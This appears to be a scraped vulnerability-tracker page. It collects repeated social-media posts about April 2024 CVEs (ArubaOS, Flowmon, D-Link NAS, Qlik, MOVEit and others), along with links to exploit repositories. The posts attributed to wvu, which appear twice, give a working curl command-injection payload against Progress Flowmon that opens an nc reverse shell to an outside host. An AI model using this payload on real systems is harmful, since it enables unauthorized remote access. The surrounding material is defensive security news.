On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

CVE-2024-26218
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-10T13:24:00.070000

6 posts

Windows Kernel Elevation of Privilege Vulnerability

1 repos

https://github.com/exploits-forsale/CVE-2024-26218

DarkWebInformer at 2024-04-29T13:04:45.326Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

jos1264@social.skynetcloud.site at 2024-04-29T09:15:02.000Z ##

PoC Exploit Released For Windows Kernel EoP Vulnerability gbhackers.com/windows-kernel-e #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft

##

DarkWebInformer@infosec.exchange at 2024-04-29T13:04:45.000Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

DarkWebInformer at 2024-04-29T13:04:45.326Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

jos1264@social.skynetcloud.site at 2024-04-29T09:15:02.000Z ##

PoC Exploit Released For Windows Kernel EoP Vulnerability gbhackers.com/windows-kernel-e #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft

##

DarkWebInformer@infosec.exchange at 2024-04-29T13:04:45.000Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

CVE-2024-2957
(7.2 HIGH)

EPSS: 0.04%

updated 2024-04-09T21:32:08

2 posts

The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field in all versions up to, and including, 20240216 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attacker to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

adulau at 2024-04-25T07:22:25.901Z ##

Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?

This would greatly simplify parsing for github.com/cve-search/vulnerab and many other tools.

Sample one: vulnerability.circl.lu/vuln/cv

##

adulau@infosec.exchange at 2024-04-25T07:22:25.000Z ##

Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?

This would greatly simplify parsing for github.com/cve-search/vulnerab and many other tools.

#cve #vulnerability #opensource #opendata

Sample one: vulnerability.circl.lu/vuln/cv

##

CVE-2024-29988
(8.8 HIGH)

EPSS: 0.46%

updated 2024-04-09T18:30:28

2 posts

SmartScreen Prompt Security Feature Bypass Vulnerability

1 repos

https://github.com/Sploitus/CVE-2024-29988-exploit

screaminggoat at 2024-04-30T19:22:23.084Z ##

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
CISA adds CVE-2024-29988 (8.8 high, disclosed 09 April 2024 by Microsoft; SmartScreen Prompt Security Feature Bypass Vulnerability) to the Known Exploited Vulnerabilities (KEV) Catalog 21 days after Trend Micro and Zero Day Initiative disputed the Patch Tuesday omission of it as an exploited vulnerability.

cc: @TheDustinChilds @todb

##

screaminggoat@infosec.exchange at 2024-04-30T19:22:23.000Z ##

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
CISA adds CVE-2024-29988 (8.8 high, disclosed 09 April 2024 by Microsoft; SmartScreen Prompt Security Feature Bypass Vulnerability) to the Known Exploited Vulnerabilities (KEV) Catalog 21 days after Trend Micro and Zero Day Initiative disputed the Patch Tuesday omission of it as an exploited vulnerability.

cc: @TheDustinChilds @todb

#CVE_2024_29988 #vulnerability #knownexploitedvulnerabilitiescatalog #eitw #activeexploitation #zeroday

##

CVE-2023-42931
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-08T22:47:13.533000

2 posts

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication.

1 repos

https://github.com/d0rb/CVE-2023-42931

screaminggoat at 2024-05-02T15:22:08.181Z ##

Alter Solutions: Local Privilege Escalating my way to root through Apple macOS filesystems
Yann Gascuel of Alter Solutions provides vulnerability details and Proof of Concept on CVE-2023-42931 (7.8 high) Local Privilege Escalation in macOS.

Note: This was originally patched and assigned a CVE back in December 2023, but did not get added to Apple's security advisories until 22 March 2024: About the security content of macOS Sonoma 14.2. It's a mess of a system where Apple quietly adds new CVEs to old security advisories without updating the associated RSS. Today 02 May 2024, CVE-2023-42931 is number 3 on the top 5 trending CVEs on Twitter, according to CVE Trends.

##

screaminggoat@infosec.exchange at 2024-05-02T15:22:08.000Z ##

Alter Solutions: Local Privilege Escalating my way to root through Apple macOS filesystems
Yann Gascuel of Alter Solutions provides vulnerability details and Proof of Concept on CVE-2023-42931 (7.8 high) Local Privilege Escalation in macOS.

Note: This was originally patched and assigned a CVE back in December 2023, but did not get added to Apple's security advisories until 22 March 2024: About the security content of macOS Sonoma 14.2. It's a mess of a system where Apple quietly adds new CVEs to old security advisories without updating the associated RSS. Today 02 May 2024, CVE-2023-42931 is number 3 on the top 5 trending CVEs on Twitter, according to CVE Trends.

#CVE_2023_42931 #vulnerability #proofofconcept

##

CVE-2024-3273
(7.3 HIGH)

EPSS: 83.36%

updated 2024-04-07T15:30:32

2 posts

A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public a

Nuclei template

8 repos

https://github.com/mrrobot0o/CVE-2024-3273-

https://github.com/adhikara13/CVE-2024-3273

https://github.com/Chocapikk/CVE-2024-3273

https://github.com/ThatNotEasy/CVE-2024-3273

https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT

https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273

https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE

https://github.com/LeopoldSkell/CVE-2024-3273

screaminggoat at 2024-04-29T14:56:25.225Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-04-29T14:56:25.000Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation

##

CVE-2023-41265
(9.6 CRITICAL)

EPSS: 87.59%

updated 2024-04-04T07:16:03

2 posts

An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the bac

Nuclei template

1 repos

https://github.com/praetorian-inc/zeroqlik-detect

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2023-34362
(9.8 CRITICAL)

EPSS: 95.56%

updated 2024-04-04T04:29:06

2 posts

In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an

Nuclei template

9 repos

https://github.com/kenbuckler/MOVEit-CVE-2023-34362

https://github.com/Malwareman007/CVE-2023-34362

https://github.com/errorfiathck/MOVEit-Exploit

https://github.com/lithuanian-g/cve-2023-34362-iocs

https://github.com/sfewer-r7/CVE-2023-34362

https://github.com/horizon3ai/CVE-2023-34362

https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs

https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362

https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362

catc0n at 2024-04-23T18:00:37.652Z ##

For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.

##

catc0n@infosec.exchange at 2024-04-23T18:00:37.000Z ##

For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.

##

CVE-2023-24932
(6.7 MEDIUM)

EPSS: 13.87%

updated 2024-04-04T03:56:20

2 posts

Secure Boot Security Feature Bypass Vulnerability

1 repos

https://github.com/Wack0/CVE-2022-21894

dw at 2024-04-25T14:07:59.950Z ##

At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".

All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.

@Rairii called it in Feb with analysis of securebootai.dll

support.microsoft.com/en-us/to

##

dw@infosec.exchange at 2024-04-25T14:07:59.000Z ##

At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".

All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.

@Rairii called it in Feb with analysis of securebootai.dll

support.microsoft.com/en-us/to

##

CVE-2023-24796
(9.8 CRITICAL)

EPSS: 0.33%

updated 2024-04-04T03:41:35

2 posts

Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows a remote attacker to execute arbitrary code via the password parameter at the /goform/sysTools and /adm/systools.asp endpoints.

sans_isc at 2024-05-02T18:11:10.139Z ##

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 i5c.us/d30890

##

sans_isc@infosec.exchange at 2024-05-02T18:11:10.000Z ##

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 i5c.us/d30890

##

CVE-2024-2389
(10.0 CRITICAL)

EPSS: 0.44%

updated 2024-04-02T15:30:43

15 posts

In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified.  An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

Nuclei template

26 repos

https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability

https://github.com/wjlin0/CVE-2024-23897

https://github.com/ThatNotEasy/CVE-2024-23897

https://github.com/Athulya666/CVE-2024-23897

https://github.com/brijne/CVE-2024-23897-RCE

https://github.com/yoryio/CVE-2024-23897

https://github.com/jopraveen/CVE-2024-23897

https://github.com/xaitax/CVE-2024-23897

https://github.com/kaanatmacaa/CVE-2024-23897

https://github.com/Nebian/CVE-2024-23897

https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read

https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897

https://github.com/B4CK4TT4CK/CVE-2024-23897

https://github.com/CKevens/CVE-2024-23897

https://github.com/Abo5/CVE-2024-23897

https://github.com/vmtyan/poc-cve-2024-23897

https://github.com/h4x0r-dz/CVE-2024-23897

https://github.com/godylockz/CVE-2024-23897

https://github.com/binganao/CVE-2024-23897

https://github.com/Vozec/CVE-2024-23897

https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-

https://github.com/viszsec/CVE-2024-23897

https://github.com/ifconfig-me/CVE-2024-23897

https://github.com/adhikara13/CVE-2024-2389

https://github.com/AbraXa5/Jenkins-CVE-2024-23897

https://github.com/raheel0x01/CVE-2024-23897

ntkramer at 2024-04-26T22:27:35.103Z ##

🥪 & : we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.

(fixed CVE # from a previous post)

viz.greynoise.io/tags/progress

##

DarkWebInformer at 2024-04-26T14:11:38.215Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

jbhall56 at 2024-04-25T12:10:52.922Z ##

The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. bleepingcomputer.com/news/secu

##

jos1264@social.skynetcloud.site at 2024-04-24T12:15:04.000Z ##

PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) helpnetsecurity.com/2024/04/24 #networkmonitoring #RhinoSecurity #vulnerability #enterprise #Don'tmiss #Progress #News #PoC

##

screaminggoat at 2024-04-23T15:24:27.352Z ##

Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗rhinosecuritylabs.com/research

Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi

##

screaminggoat at 2024-04-23T15:17:31.370Z ##

@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 support.kemptechnologies.com/h

##

campuscodi@mastodon.social at 2024-04-23T14:30:25.000Z ##

Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: support.kemptechnologies.com/h

Rhino Labs has published a write-up on the bug here: rhinosecuritylabs.com/research

The issue is tracked as CVE-2024-2389.

##

wvu at 2024-04-23T07:25:19.407Z ##

Progress Kemp Flowmon CVE-2024-2389:

curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'

##

ntkramer@infosec.exchange at 2024-04-26T22:27:35.000Z ##

🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.

(fixed CVE # from a previous post)

viz.greynoise.io/tags/progress

##

DarkWebInformer@infosec.exchange at 2024-04-26T14:11:38.000Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

jbhall56@infosec.exchange at 2024-04-25T12:10:52.000Z ##

The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. bleepingcomputer.com/news/secu

##

screaminggoat@infosec.exchange at 2024-04-23T15:24:27.000Z ##

Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗rhinosecuritylabs.com/research

Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi

#Progress #Flowmon #vulnerability #CVE_2024_2389

##

screaminggoat@infosec.exchange at 2024-04-23T15:17:31.000Z ##

@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 support.kemptechnologies.com/h

#CVE_2024_2389 #Progress #PatchTuesday #vulnerability

##

campuscodi@mastodon.social at 2024-04-23T14:30:25.000Z ##

Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: support.kemptechnologies.com/h

Rhino Labs has published a write-up on the bug here: rhinosecuritylabs.com/research

The issue is tracked as CVE-2024-2389.

##

wvu@infosec.exchange at 2024-04-23T07:25:19.000Z ##

Progress Kemp Flowmon CVE-2024-2389:

curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'

##

CVE-2023-44487
(5.3 MEDIUM)

EPSS: 73.93%

updated 2024-04-01T16:13:53

2 posts

## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the

12 repos

https://github.com/TYuan0816/cve-2023-44487

https://github.com/terrorist/HTTP-2-Rapid-Reset-Client

https://github.com/sigridou/CVE-2023-44487-

https://github.com/ByteHackr/CVE-2023-44487

https://github.com/secengjeff/rapidresetclient

https://github.com/studiogangster/CVE-2023-44487

https://github.com/bcdannyboy/CVE-2023-44487

https://github.com/nxenon/cve-2023-44487

https://github.com/ReToCode/golang-CVE-2023-44487

https://github.com/pabloec20/rapidreset

https://github.com/ndrscodes/http2-rst-stream-attacker

https://github.com/imabee101/CVE-2023-44487

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

CVE-2024-3128
(2.4 LOW)

EPSS: 0.04%

updated 2024-04-01T15:30:38

1 posts

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in Replify-Messenger 1.0 on Android. This issue affects some unknown processing of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The

xje4 at 2024-04-30T10:33:50.314Z ##

Grafana erlaubt als ""Feature"" jedem angemeldeten User beliebige SQL Queries abzusetzen.

CVE-2024-3128

fdlucifer.github.io/2024/04/22

##

CVE-2024-3094
(10.0 CRITICAL)

EPSS: 10.08%

updated 2024-03-29T18:30:50

5 posts

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. The tarballs included extra .m4 files, which contained instructions for building with automake that did not exist in the repository. These instructions, through a series of complex obfuscations, extract a prebuilt object file from one of the test archives, which is then used to modify specific functions in t

Nuclei template

60 repos

https://github.com/robertdebock/ansible-playbook-cve-2024-3094

https://github.com/Mustafa1986/CVE-2024-3094

https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container

https://github.com/felipecosta09/cve-2024-3094

https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker

https://github.com/iheb2b/CVE-2024-3094-Checker

